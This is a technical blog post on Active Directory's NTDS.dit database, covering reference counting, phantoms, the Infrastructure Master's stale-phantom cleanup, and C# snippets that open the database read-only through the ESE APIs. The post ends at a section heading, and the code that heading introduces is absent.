Let's now logically delete the first object, "CN=Christoffer Andersson" (the one that "CN=Jimmy Andersson" references), and wait until it is up for physical deletion (i.e. the tombstone lifetime has passed since the object was logically deleted). "CN=Christoffer Andersson" is now about to be physically deleted from the database, but it is NOT: to satisfy the requirement mentioned above and not leave "CN=Jimmy Andersson" pointing at a non-existing object in its 'seeAlso' attribute, "CN=Christoffer Andersson" instead remains represented as a non-object, also known as a phantom, and will remain in the database for as long as the reference exists.
Linked vs. non-linked references:
Simple references – These are non-linked attributes, as in the example described above with the 'seeAlso' attribute. Such references are not removed when the referenced object is logically deleted, and remain until one of the following happens:
The object holding the reference is deleted (in the example described above, the object "CN=Jimmy Andersson" is deleted; this potentially frees the last reference to "CN=Christoffer Andersson", as the 'seeAlso' attribute is deleted as part of deleting the object).
The reference itself is removed (in the example described above, the attribute value of 'seeAlso' is removed on the object "CN=Jimmy Andersson"; this potentially frees the last reference to "CN=Christoffer Andersson").
Linked references – These are linked attributes; such references are usually removed during logical deletion (i.e. during the transformation into a tombstone or recycled object). However, backlinks are kept during a read-only naming context (NC) teardown.
Demotion from an object to a non-object (phantom):
An object can be converted (demoted) from a real object into a non-object, also known as a phantom, for two different reasons:
The object (e.g. a tombstone or recycled object) has expired (e.g. passed the tombstone lifetime or the deleted object lifetime).
In addition to the attributes listed in (a.), any attribute keeping the object (the database row) on the index being garbage collected is preserved (e.g. msDS-Entry-Time-To-Die); otherwise the object or phantom wouldn't be up for examination the next time the garbage collector process runs.
If there are NO references pointing towards the phantom after performing (a.), then the phantom (the row in the database) is up for physical deletion and will be completely removed from the database at the next garbage collector cycle (which by default runs every 12 hours). However, if there ARE still references pointing towards the object, it will remain as a non-object, also known as a phantom, until all references pointing towards it have been removed.
The object is leaving a DSA as a result of a read-only naming context (NC) teardown but still has references pointing towards it. In this case the following happens:
In addition to linked and non-linked attributes, there are two other kinds of references:
If an object has descendant (child) objects and/or phantoms, it has one reference pointing towards it for each direct descendant (child) object or phantom.
All objects (not phantoms) hold a reference to themselves via the Obj-Dist-Name attribute (http://msdn.microsoft.com/en-us/library/ms675516(v=VS.85).aspx).
References and Reference Counting within NTDS.dit
An object (row) in the database is represented locally and independently (on each DSA) within each database by a DNT, short for distinguished name tag. (You need to be familiar with the concept of DNTs in order to understand reference integrity at the database layer in NTDS.dit; I've already given an introduction to DNTs in How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 2.)
Table 22: datatable – Simplified for reference integrity
The CNT_col column keeps track of how many references point to the actual row from other rows in the database.
That might be:
One count for each DN-syntax attribute value that holds the object (linked, non-linked, deleted, tombstone and recycled).
One count for each direct descendant (child) object underneath the object.
One count if the delayed link processing mechanism or the link cleaner is working with links on the object.
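The contributions to CNT_col listed above can be modeled with a small sketch. This is a hypothetical illustration, not actual DSA code; the dictionary keys (`dn_valued_references`, `children`, `link_processing_in_progress`) are names I made up for the illustration:

```python
# Hypothetical model of what contributes to a row's CNT_col reference count.
def reference_count(row):
    count = 0
    # One count per DN-syntax attribute value (on any row) holding this object,
    # including the row's own Obj-Dist-Name self-reference.
    count += len(row.get("dn_valued_references", []))
    # One count per direct descendant (child) object or phantom.
    count += len(row.get("children", []))
    # One count while delayed link processing / the link cleaner works the row.
    if row.get("link_processing_in_progress", False):
        count += 1
    return count
```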
Simple references in NTDS.dit
Let's add a simple reference to a sample NTDS.dit database:
“Elina Andersson” has a reference count “CNT_col” of “2” because of:
“Elina Andersson”‘s own self-reference from the “Obj-Dist-Name” attribute.
“Lena Andersson” is referencing “Elina Andersson” by the “seeAlso” attribute.
Let’s logically delete “Elina Andersson” and have a look what happens in the database:
Note: X represent when the object was logically deleted ex: 2012-09-09 09:09:09
The only notable change to the reference in this state is that it is represented outside the database as a deletion-mangled RDN in the value of the "seeAlso" attribute on "Lena Andersson", e.g. CN=Elina Andersson\0ADEL:1e5f5da7-af10-4d69-9c06-491c79659116
Let's pretend that 60/180 days (i.e. the tombstone lifetime) have elapsed since X = 2012-09-09 09:09:09, when "Elina Andersson" was logically deleted, and have a look at the database again:
The garbage collector will now have tried to physically delete "Elina Andersson" but failed, because the reference count "CNT_col" is not yet zero: "Elina Andersson" is still being referenced by "Lena Andersson"'s "seeAlso" attribute. Instead, the object was converted into a non-object, also known as a phantom. As a result, note the following:
"Elina Andersson" lost the "Obj-Dist-Name" attribute (the self-reference) when it was converted to a non-object (phantom), and its reference count "CNT_col" therefore dropped from 2 to 1.
"Elina Andersson"'s "OBJ_col" was changed from 1 to NULL to indicate that the row in the database now represents a non-object (phantom) instead of an object.
Let’s pretend that a few weeks later “Lena Andersson” is logically deleted and have a look at the database again:
Note: When "Lena Andersson" was logically deleted and transformed into a tombstone or recycled object, it lost the value of the "seeAlso" attribute, as that attribute is not preserved on logical deletion by default: see Attributes preserved on logical deletion for more information.
This means that "Elina Andersson" is now free to be deleted (no more references to DNT 5524). As "Lena Andersson" held the last reference towards "Elina Andersson" in the database, "Elina Andersson"'s reference count "CNT_col" is now 0, and "Elina Andersson" will be deleted the next time the garbage collector runs.
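The whole lifecycle above can be replayed as a short sketch. This is a hypothetical illustration of the column transitions described in the walk-through, not actual DSA code; only CNT_col and OBJ_col are modeled:

```python
# Hypothetical replay of the simple-reference lifecycle:
# CNT_col = reference count, OBJ_col = 1 for objects, None (NULL) for phantoms.
elina = {"CNT_col": 2, "OBJ_col": 1}  # self-reference + Lena's seeAlso
lena = {"CNT_col": 1, "OBJ_col": 1}   # self-reference only

# Tombstone lifetime passes; the garbage collector can't remove Elina
# (CNT_col > 0), so the row is demoted to a phantom instead:
elina["CNT_col"] -= 1    # the Obj-Dist-Name self-reference is dropped
elina["OBJ_col"] = None  # the row now represents a non-object (phantom)

# Lena is logically deleted; seeAlso isn't preserved on deletion,
# which frees the last reference to Elina:
elina["CNT_col"] -= 1

# Elina's row is now eligible for physical deletion at the next GC pass:
assert elina == {"CNT_col": 0, "OBJ_col": None}
```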
Linked references in NTDS.dit
Let's add a linked reference to a sample NTDS.dit database:
"Elina Andersson" is a member of "Group X" (the hosting object); the member attribute is the forward link, referencing "Elina Andersson". The reference count "CNT_col" is increased by 1 on "Elina Andersson".
Note: There is no reference count from the backlink towards the forward link. No dangling backlink reference is possible, since if the host DN is removed it must first have been logically deleted, which implicitly removes all link attributes and their associated targets' backlinks.
Logically deleting either "Group X" or "Elina Andersson" would decrease the reference count "CNT_col" by 1 and remove the corresponding row above in the 'link_table', as well as removing the value "Elina Andersson" from the member attribute on "Group X".
Cross Naming Context (NC) references
A reference can be made between two objects that reside in different naming contexts (regardless of whether the reference is simple or linked), with the following restrictions:
Objects in non-domain naming contexts (NDNCs) can have the following references:
a. To any object within the configuration naming context (NC).
b. To any object within the schema naming context (NC).
c. To the naming context head of any non-domain naming context (NDNC).
d. To any object within their own naming context (NC).
All references other than a, b, c and d are disallowed.
Objects in a domain naming context, the schema naming context or the configuration naming context can have the following references:
a. To any object within any domain naming context (NC) within the forest.
b. To any object within the schema naming context (NC).
c. To any object within the configuration naming context (NC).
d. To any non-domain naming context (NDNC) head.
All references other than a, b, c and d are disallowed, except values of non-replicated linked attributes, which can reference any object/row present in the local database (NTDS.dit) on a given DSA.
Let’s have a look at Cross Naming Context (NC) references in NTDS.dit
First we have to explain one new column and an attribute that play a major role in cross naming context (NC) references.
The 'instanceType' attribute determines whether the object is writable, whether it is a naming context (NC) head itself, and whether there is any other naming context above it, using the following bits:
0x00000001 – The head of naming context.
0x00000002 – This replica is not instantiated.
0x00000004 – The object is writable on this directory.
0x00000008 – The naming context above this one on this directory is held.
0x00000010 – The naming context is in the process of being constructed for the first time by using replication.
0x00000020 – The naming context is in the process of being removed from the local DSA.
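A small helper can decode a raw instanceType value into the bit meanings listed above. This is an illustrative sketch (the bit values are from the list above; the helper itself is not part of any Microsoft API):

```python
# Hypothetical decoder for the instanceType bits listed above.
INSTANCE_TYPE_BITS = {
    0x00000001: "NC head",
    0x00000002: "replica not instantiated",
    0x00000004: "writable on this directory",
    0x00000008: "NC above is held on this directory",
    0x00000010: "NC being constructed by replication",
    0x00000020: "NC being removed from the local DSA",
}

def decode_instance_type(value):
    # Return the description of every bit set in the value.
    return [name for bit, name in INSTANCE_TYPE_BITS.items() if value & bit]
```

For example, the instanceType of 4 seen on writable objects below decodes to "writable on this directory", while 0 (a read-only GC copy) decodes to nothing at all.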
Let's add cross naming context (NC) references to a sample NTDS.dit database on a DSA that is a GC.
Note: "Elina Andersson" has an instanceType of 0 – that means "Elina Andersson" is a read-only object on this DSA and is part of a read-only naming context. Typically that means a global catalog (GC) hosting the domain naming context (NC) that "Elina Andersson" resides in, while some other DSA hosts a writable copy of "Elina Andersson".
"Lena Andersson", however, has an instanceType of 4 – that means "Lena Andersson" is writable on this DSA and is part of a naming context that is authoritatively held on this DSA, typically the domain naming context.
The only difference here from the scenarios already mentioned is that if "Elina Andersson" were to be logically deleted, it would happen (originate) on a DSA that hosts a writable copy of "Elina Andersson".
Let's have a look at cross-database references (which imply cross naming context (NC) references) in NTDS.dit
Cross-database references are between two objects where one of the objects is located in an uninstantiated naming context (NC), i.e. a naming context (NC) not held by the DSA (typically a DSA that is not a global catalog (GC)).
Let's consider the following scenario: a forest with two domains, D1 and D2, where D1 has at least one DC that is NOT a GC, e.g. D1-DC1, and D2 has at least one DC that is also a GC, e.g. D2-GC1.
Let's imagine that D1 hosts the user object "CN=Gustav Morath,CN=Users,DC=D1,DC=x", which references "CN=Robin Granberg,CN=Users,DC=D2,DC=x" in its 'seeAlso' attribute. This relationship causes an issue on D1-DC1: D1-DC1 doesn't host the referenced object "CN=Robin Granberg,CN=Users,DC=D2,DC=x", because it doesn't hold a copy of the naming context (NC) for the D2 domain, as it's not a global catalog (GC).
Let’s now first look at the database (NTDS.dit) on D2-GC1:
Let’s now look into the database (NTDS.dit) on D1-DC1:
This problem is solved by representing "Robin Granberg" as a non-object, also known as a phantom, to satisfy reference integrity. During the update of the object "Gustav Morath", the distinguishedName (DN) of "Robin Granberg" is requested to be added to the 'seeAlso' attribute, and during this request a few things are validated:
Verify that the distinguishedName we're about to reference really exists:
If the distinguishedName entered matches an existing local object within the local database (NTDS.dit): in this case it doesn't, as we don't host the object "Robin Granberg" – the object resides in another, uninstantiated naming context (D2).
If the distinguishedName entered matches any object within the enterprise; this is verified by going off the local machine, in this case D1-DC1, and performing the lookup on a DC that is also a global catalog server (GC), as those host all referenceable objects. If the object exists on the queried GC, the object's GUID and SID (if they exist) are retrieved as well.
Verify that the reference constraints mentioned above under Cross Naming Context (NC) references are fulfilled.
If 1b and 2 above are fulfilled, a phantom for the referenced object is created in the local database (NTDS.dit), in this case on D1-DC1, representing the object "Robin Granberg", including any structural phantoms needed to represent the full DN of "Robin Granberg":
Here is a sample of how the representation of the object "Robin Granberg" as a phantom, and the needed structural phantoms, would look on D1-DC1:
How cross-database references are maintained to not become “stale” (outdated) in NTDS.dit
We have now gone through how reference phantoms, and eventually any needed structural phantoms, are created on non-GCs (global catalog servers) to satisfy reference integrity. The initial creation of those phantoms is done by the local DSA: once a reference is written and isn't found within the local database on the given DSA, it performs an "enterprise/forest-wide verification" by locating a global catalog using the 'DsGetDcName' (DCLocator) API with the flag 'DS_GC_SERVER_REQUIRED' to find a suitable GC (global catalog server) to verify names against, using the RPC interface method 'IDL_DRSVerifyNames' with the flag 'DRS_VERIFY_DSNAMES'.
Let’s now imagine that the object “Robin Granberg” undergoes one of the following changes:
Being logically deleted (The case we’re focusing on in this article)
Having its RDN (Relative Distinguished Name) changed. (The object is renamed)
Being moved (changes parent) so that the DN (Distinguished Name) is being changed.
Had its SID changed.
If one of the cases mentioned above happens to "Robin Granberg" on D2-GC1 (or another DC that holds an authoritative/writable copy of the object), the phantom used to represent the reference to "Robin Granberg" from "Gustav Morath"'s 'seeAlso' attribute will become outdated (stale) on D1-DC1.
The scenarios described above introduce the requirement for the flexible single master operations (FSMO) role 'Infrastructure Master' (IM), which in my opinion originally had a better name: the 'Phantom Master'. The IM is responsible for maintaining phantoms within a given domain and making sure that they don't become outdated (stale) while the "real" objects they represent change, as described above, in other domains. The IM is also responsible for spreading the word about any outdated (stale) phantoms and their new state to other DCs in its domain that are not GCs (global catalog servers) – except when the Recycle-Bin is on, in which case all DCs that are not GCs are responsible for this task on their own.
The Infrastructure Master (IM) process with the Recycle-Bin Off
So let's have a look at how the IM (Infrastructure Master) will update a phantom when the "real" object is logically deleted in its own domain – specifically, in this case, when "Robin Granberg" is logically deleted in the D2 domain. (To simplify this scenario, we have removed the reference in the 'seeAlso' attribute from 'Gustav Morath' to 'Robin Granberg'.)
The IM (Infrastructure Master), in this case D1-DC1, will periodically run a background task (see 'The Stale Phantom Background Task' below for details) that compares the phantoms within its local database (NTDS.dit) with a GC (global catalog server), in this case D2-GC1, using the RPC interface method 'IDL_DRSVerifyNames' with the flag 'DRS_VERIFY_DSNAMES'. In this case "Robin Granberg" is one of the phantoms being verified; the phantom "Robin Granberg" is matched against the real object representing "Robin Granberg" in the D2 domain by its GUID.
The name is brought back over RPC as a return of 'IDL_DRSVerifyNames'. The IM (Infrastructure Master), in this case D1-DC1, will now compare the obtained name of "Robin Granberg" from the GC (global catalog server), in this case D2-GC1, and determine that the name doesn't match, as "Robin Granberg" now (as a result of the logical deletion on D2-GC1) has the deletion-mangled name "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517".
D1-DC1 will now create an 'InfrastructureUpdate' object, using a random GUID as its RDN, as a descendant/child of the "CN=Infrastructure,DC=D1,DC=X" object, with the 'dnReferenceUpdate' attribute containing the updated name "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517"
D1-DC1 will then immediately delete the 'InfrastructureUpdate' object created above and let it replicate to other DCs within D1. Note that the 'dnReferenceUpdate' attribute is preserved during logical deletion (i.e. the attribute is present on the tombstone); see the 'Attributes preserved on logical deletion' section above for more information.
The DSAs have special code to detect a write to 'dnReferenceUpdate', either locally, as in this case on D1-DC1, or via replication. Once a write is detected, the local phantom is located by its GUID and updated accordingly – in this case the RDN of "Robin Granberg" is updated to "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517". Note: An additional check is done to determine whether the name is deletion-mangled, as in the case of "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517"; this makes all DSAs locally start removing all backlinks pointing to the phantom "CN=Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517".
Note: There is no need to set the 'isDeleted' attribute, as it doesn't exist on phantoms; the name is already deletion-mangled.
Note: There is no need to set the 'time_col' column, as all phantoms already have it. (The only thing preventing them from being garbage collected/physically deleted is that they are still being referenced.)
However, reaching stage (7.) in the sample above doesn't physically remove the database row representing the phantom "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517", because it now has a 'CNT_col' count of 1: the 'InfrastructureUpdate' object references it.
Note: This means that we have to wait for a TSL (tombstone lifetime) to pass (by default 60/180 days) before the 'InfrastructureUpdate' object is garbage collected; only then will the database row representing the phantom "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517" lose the last reference towards it and reach a 'CNT_col' count of 0. The next time the garbage collector runs (by default every 12 hours), the row representing the phantom "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517" can be physically deleted.
Summary: It takes another 60/180 days + 12h after step (7.) in the sample above before the database row representing "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517" is gone from D1-DC1.
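The worst-case timeline above is simple arithmetic: one full tombstone lifetime for the 'InfrastructureUpdate' tombstone to expire, plus at most one garbage collection interval before the freed phantom row is physically deleted. A sketch, assuming the default values (both are configurable):

```python
# Rough worst-case cleanup timeline for a phantom row held alive
# by an InfrastructureUpdate reference, per the summary above.
TSL_DAYS = 180          # tombstone lifetime (60 days on older forests)
GC_INTERVAL_HOURS = 12  # default garbage collection interval

def phantom_removal_delay_hours(tsl_days=TSL_DAYS, gc_hours=GC_INTERVAL_HOURS):
    # One TSL for the InfrastructureUpdate tombstone to expire,
    # then at most one more GC pass before physical deletion.
    return tsl_days * 24 + gc_hours
```

With the 180-day TSL this comes out to 4332 hours; with the older 60-day TSL, 1452 hours.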
The Infrastructure Master (IM) process with the Recycle-Bin On
So let's have a look at how a DC that isn't a GC (global catalog) will update a phantom when the "real" object is logically deleted in its own domain – specifically, in this case, when "Robin Granberg" is logically deleted in the D2 domain. (To simplify this scenario, we have removed the reference in the 'seeAlso' attribute from 'Gustav Morath' to 'Robin Granberg'.)
As the Recycle-Bin is enabled in this case, all DCs that aren't GCs (global catalogs) – more specifically D1-DC1 – are now responsible on their own for periodically running a background task (see 'The Stale Phantom Background Task' below for details) that compares the phantoms within the local database (NTDS.dit) with a GC (global catalog server), in this case D2-GC1, using the RPC interface method 'IDL_DRSVerifyNames' with the flag 'DRS_VERIFY_DSNAMES'. In this case "Robin Granberg" is one of the phantoms being verified; the phantom "Robin Granberg" is matched against the real object representing "Robin Granberg" in the D2 domain by its GUID.
The name is brought back over RPC as a return of 'IDL_DRSVerifyNames'. The DC, in this case D1-DC1, will now determine whether the state of the object has changed, as follows:
If the name obtained from the GC (global catalog), in this case D2-GC1, is different from the name of the local phantom, in this case "Robin Granberg" – here, as a result of the logical deletion on D2-GC1, the name has changed to the deletion-mangled name "Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517" – the local phantom will be updated to reflect the name change.
If the phantom is logically deleted in the local database (NTDS.dit), in this case on D1-DC1, but the state obtained from the GC (global catalog), in this case D2-GC1, says it no longer is, the following actions are taken locally on the DC, in this case D1-DC1:
Forward links are activated.
Back links are activated.
If the phantom locally represents a live object in the database (NTDS.dit), in this case on D1-DC1, but the state obtained from the GC (global catalog), in this case D2-GC1, says it's logically deleted, the following actions are taken locally on the DC, in this case D1-DC1:
Forward Links are deactivated.
Back Links are deactivated.
If the phantom is recycled locally in the database (NTDS.dit), in this case on D1-DC1, but the state obtained from the GC (global catalog), in this case D2-GC1, says it no longer is, the following actions are taken locally on the DC, in this case D1-DC1:
The ‘recycle_time_col’ is set to NULL.
If the phantom isn't locally recycled in the database (NTDS.dit), in this case on D1-DC1, but the state obtained from the GC (global catalog), in this case D2-GC1, says it is, the following actions are taken locally on the DC, in this case D1-DC1:
Forward Links are removed
Back Links are removed
The ‘recycle_time_col’ is being set.
The Stale Phantom Background Task
The IM (Infrastructure Master) will scan its local NTDS.dit database for phantoms, using a rough estimate of a scan rate based on how long it should take to scan and verify all phantoms, measured in days – by default 2 days. The default value can be configured via a registry parameter: "Days per Database Phantom Scan".
The 'Days per Database Phantom Scan' DWORD registry value can be configured under the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<INSTANCE>\Parameters. Note: a value of 0 can't be used, and the maximum is 365 days.
This means that the DSA acting as the IM (Infrastructure Master) – or, if the Recycle-Bin is enabled, all DSAs that aren't also acting as GCs (global catalog servers) – will scan the local database (NTDS.dit) more or less aggressively to meet the rate of 'Days per Database Phantom Scan', using the following algorithm:
Make sure that the next pass runs no more often than every 15 minutes and no less often than every 24 hours:
1. If calculatedDelay < 900 seconds (15 minutes):
The next scan will take place in 15 minutes.
2. If calculatedDelay > 86400 seconds (24 hours):
The next scan will take place in 24 hours.
3. Otherwise (calculatedDelay passes checks 1. and 2. above):
The next scan will take place in <calculatedDelay>.
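The rescheduling rules above boil down to clamping the calculated delay between the two bounds. A minimal sketch (not DSA code, just the clamp described above):

```python
# Clamp the calculated rescheduling delay between 15 minutes (900 s)
# and 24 hours (86400 s), per the algorithm above.
def next_scan_delay(calculated_delay_seconds):
    return max(900, min(86400, calculated_delay_seconds))
```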
Once a local phantom scan has been initiated (at least every 24 hours) on the IM (Infrastructure Master) – or, if the Recycle-Bin is enabled, on all DSAs that aren't also acting as GCs (global catalog servers) – it will scan the local database for phantoms and verify whether they are up to date or have become outdated (stale) against a global catalog server (GC), until:
It has made the maximum allowed number of trips (10) to a GC (global catalog) to verify phantoms (a maximum of 240 phantoms are verified on each trip). The requirement of making no more than 10 trips to a GC comes from not occupying the DSA's task queue for too long.
The following is only applicable if the Recycle-Bin is off: the maximum allowed number of stale phantoms (720) has been returned by the GC (global catalog) and identified as stale. The requirement of updating a maximum of 720 stale phantoms comes from the limit of ~800 values in a non-linked multi-valued attribute back in the Windows 2000 days, since the stale phantoms are written to the infrastructureUpdate (carrier) object's dnReferenceUpdate attribute.
All phantoms in the database have been verified by the GC (global catalog) without hitting the limits of (1.) or, if the Recycle-Bin is off, (2.) above.
The task will reschedule itself using the algorithm above.
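One scan pass under the limits above can be sketched as follows. This is a hypothetical model of the batching behaviour described in the text (10 trips, 240 phantoms per trip, 720 stale phantoms per pass when the Recycle-Bin is off), not actual DSA code:

```python
# Hypothetical sketch of one stale-phantom scan pass:
# at most max_trips trips to a GC, batch_size phantoms verified per trip,
# and (Recycle-Bin off) at most max_stale stale phantoms handled per pass.
def scan_pass(phantoms, recycle_bin_on=False,
              max_trips=10, batch_size=240, max_stale=720):
    verified = stale = trips = 0
    for start in range(0, len(phantoms), batch_size):
        if trips == max_trips:
            break  # limit (1.): no more than 10 trips per pass
        batch = phantoms[start:start + batch_size]
        trips += 1
        verified += len(batch)
        stale += sum(1 for p in batch if p["stale"])
        if not recycle_bin_on and stale >= max_stale:
            break  # limit (2.): stale phantoms capped per carrier object
    return verified, trips
```

With 3000 phantoms and none stale, a pass verifies at most 2400 phantoms (10 trips of 240) before rescheduling; with many stale phantoms and the Recycle-Bin off, the 720-stale limit ends the pass earlier.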
The following event will be logged once the task is completed:
Table 24: Stale Phantom Cleanup Success Event
Event ID
Source
Category
Description
1421
ActiveDirectory_DomainService
Directory Access
Internal event: The infrastructure update task has completed with the following results.
Queried phantom references:
<Number of queried phantoms>
Phantom references that exist on the local domain controller:
<Rough estimate of phantoms in the database>
Updated phantom references:
<Phantoms updated during this run>
The infrastructure update task will resume after the following interval.
The Stale Phantom background task can be initiated manually by triggering the operational attribute checkPhantoms (http://msdn.microsoft.com/en-us/library/cc223316(v=prot.20).aspx). Note: The task can only be triggered on the DC holding the Infrastructure flexible single master operations role – or on all DCs (except global catalog servers) if the Recycle-Bin is enabled – and is still subject to the algorithm above, but it won't automatically reschedule itself. (I.e. you may need to invoke the operational attribute multiple times to verify all phantoms.)
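As a sketch, triggering the operational attribute could look like the following rootDSE modify in LDIF form (this is my assumption based on how other rootDSE modify operations are commonly invoked with ldifde; run it against the IM holder, or any non-GC DC when the Recycle-Bin is enabled):

```
dn:
changetype: modify
add: checkPhantoms
checkPhantoms: 1
-
```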
Local Lingering Phantoms
A local lingering phantom is a phantom that exists locally in the database (NTDS.dit) on the IM (Infrastructure Master) – or, if the Recycle-Bin is enabled, on any DSA that isn't also acting as a GC (global catalog) – while the real object that the local phantom represents can't be found/verified on a GC (global catalog). Reasons for this can be:
The object that the phantom represents has been physically deleted (i.e. garbage collected) in its source domain, while the local phantom has not. This is common for simple references, which prevent the local phantom from being physically deleted (garbage collected) because references are still pointing towards it.
Objects in the distribution database (NTDS.dit) that are deleted during installation (DCPROMO).
The following events are logged if a local lingering phantom is detected:
Table 25: Local Lingering Phantom Event
Event ID
Source
Category
Description
2126
ActiveDirectory_DomainService
Directory Access
The phantom object <Lingering Phantom> exists in the local Active Directory Domain Services database, but doesn't exist in the database of another GC. This may indicate that replication has not completed, or may indicate that the local Active Directory Domain Services database contains a lingering phantom. If this state persists, it indicates a lingering phantom.
Used by the phantom cleanup task to find reference phantoms to be verified for staleness.
Note: Only present in Windows Server 2008 R2 databases and later
The following Performance Monitors are available to track Stale Phantom Cleanup activity:
Table 27: Stale Phantom Cleanup Performance Counters
Category
Name
Operating System
Description
NTDS
Phantoms Visited/sec
Windows Server 2008 or later
The rate at which phantoms are visited to determine if they are stale and need to be cleaned.
NTDS
Phantoms Cleaned/sec
Windows Server 2008 or later
The rate at which stale phantoms are cleaned.
I think this is all I can think of for now when it comes to Active Directory and deletions/removal of data. If you have read all the way to the end, you can see that this goes deep into the fundamentals of Active Directory and is rather complex.
So what is the “Code [1-3]” all about and where is Part 4 of the series that you might expect?
Before I go ahead with Part 4, I thought it would be a good idea to sum up Part 1 to Part 3 with code (so that you know how we figured out all this stuff while we were coding ESEDump). Note: This post may be targeted more at the developer audience than the general Active Directory administrator.
Disclaimer: The code samples provided here are code snippets that don't represent any actual code from the DSA or any other Microsoft products and technologies, nor do they represent the complete source of ESEDump.
ESEHelper – A managed ESE wrapper around the ESE APIs
We decided that we wanted to work with ESE in C# (and when we first started this project, EseManaged from CodePlex wasn't around), and even if we could have used it later on, I guess we wanted full control and decided to stick with our own wrapper. So when you see references to "EseHelper" in the code snippets below, you know it's just a wrapper around the Extensible Storage Engine native APIs – there are no secrets here.
JET_RETRIEVECOLUMN structure custom methods
We extended the JET_RETRIEVECOLUMN structure with some additional methods to retrieve data.
Table 0: JET_RETRIEVECOLUMN structure
Code Snippet
// The custom methods in JET_RETRIEVECOLUMN allow us to quickly
// interpret each column's data depending on its data type (string, integer, etc.)
internal struct JET_RETRIEVECOLUMN
{
public int columnid;
public IntPtr pvData; // Pointer to the data block in memory
public int cbData; // Size of the allocated data block
public int cbActual; // Size of the actual/used data
public int grbit;
// Offset to the first byte to be retrieved from a column of type
// JET_coltypLongBinary or JET_coltypLongText
public int ibLongValue;
// Number of values in a multi-valued column
// Can be used to retrieve a specific value
public int itagSequence;
// The columnid of the tagged, multi-valued, or sparse column
// when all tagged columns are retrieved by passing 0
// as the columnid to JetRetrieveColumn
public int columnidNextTagged;
public int err;
public void Initialize(ColumnInfo att)
{
this.Initialize(att.ID, 0);
}
public void Initialize(ColumnInfo att, int cbData)
{
// Initialize with a data block of cbData size
this.Initialize(att.ID, cbData);
}
public void Initialize(int columnid)
{
// Initialize with an empty data block
this.Initialize(columnid, 0);
}
public void Initialize(int columnid, int cbData)
{
// Reset the fields
this.cbActual = 0;
this.cbData = 0;
this.err = 0;
// Make sure to free any previously used memory in this instance
if (this.pvData != IntPtr.Zero)
{
Marshal.FreeHGlobal(this.pvData);
this.pvData = IntPtr.Zero;
}
this.columnid = columnid;
this.itagSequence = 1;
// Allocate a new memory block if necessary (if > 0 bytes requested)
this.cbData = cbData;
if (this.cbData > 0)
this.pvData = Marshal.AllocHGlobal(this.cbData);
}
// Copies the current memory block into a byte array
public byte[] GetData()
{
var data = new byte[this.cbActual];
if (this.pvData != IntPtr.Zero)
Marshal.Copy(this.pvData, data, 0, this.cbActual);
return data;
}
}
// ColumnInfo (a separate struct) caches column metadata per table
internal struct ColumnInfo
{
public int ID, DataType, AltId;
public string Name, AltName; // AltName added for attribute name
public IntPtr TableId; // added for table support in caching
public ColumnInfo(int id, string name, int type, string altname, int altid, IntPtr tableid)
{ this.ID = id; this.Name = name; this.DataType = type; this.AltName = altname; this.AltId = altid; this.TableId = tableid; }
}
Perform Initialization and Attach to NTDS.dit
The first thing we had to figure out was how to attach to the database (NTDS.dit) using JetInit, JetBeginSession, JetAttachDatabase and finally JetOpenDatabase. In addition to those calls, we had to set several parameters with JetSetSystemParameter for our usage; for example, some things need to be turned off because we attach/open the DB read-only due to the nature of our application.
Table 1: ESE Initialization
Code Snippet
// E.Check makes sure a JET API call is successful, i.e. JET_errSuccess (0)
// If the call fails, we throw an exception/write to the Console
// Initialize ESENT. Setting JetInit will inspect the logfiles to see if the last
// shutdown was clean. If it wasn’t (e.g. the application crashed) recovery will be
// run automatically bringing the database to a consistent state.
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramDatabasePageSize), new IntPtr(0x2000), null));
// Set up the recovery option (off), online defragmentation (off),
// the maximum number of temporary tables (7) and the temporary path
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramRecovery), IntPtr.Zero, "off"));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramEnableOnlineDefrag), IntPtr.Zero, null));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(0xa), IntPtr.Zero, null));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramMaxTemporaryTables), new IntPtr(7), null));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramTempPath), IntPtr.Zero, System.IO.Path.GetTempPath()));
// Initialize ESE, begin a session, then attach and open the database read-only
err = E.Check(EseHelper.JetInit(ref instance));
err = E.Check(EseHelper.JetBeginSession(instance, out sesid, null, null));
err = E.Check(EseHelper.JetAttachDatabase(sesid, "NTDS.dit", 1)); // 1 = JET_bitDbReadOnly
err = E.Check(EseHelper.JetOpenDatabase(sesid, "NTDS.dit", null, out dbid, 1));
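For completeness, the session should be torn down in reverse order when you are done. A minimal sketch, assuming the same EseHelper wrapper and E.Check helper as in the snippets above (the exact wrapper signatures are my assumption; the underlying JetCloseDatabase, JetDetachDatabase, JetEndSession and JetTerm calls are standard ESE APIs):

```csharp
// Hypothetical teardown mirroring the initialization above; EseHelper and
// E.Check are the wrapper helpers used throughout this post's snippets.
err = E.Check(EseHelper.JetCloseDatabase(sesid, dbid, 0));     // close the DB handle
err = E.Check(EseHelper.JetDetachDatabase(sesid, "NTDS.dit")); // detach the file
err = E.Check(EseHelper.JetEndSession(sesid, 0));              // end the session
err = E.Check(EseHelper.JetTerm(instance));                    // terminate the instance
```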
List the tables inside NTDS.dit
We figured out that by opening the “MSysObjects” table and positioning over the “RootObjects” index, we could enumerate the tables inside the database using the following code snippet.
Table 2: ESE Enumerate tables inside the database
Code Snippet
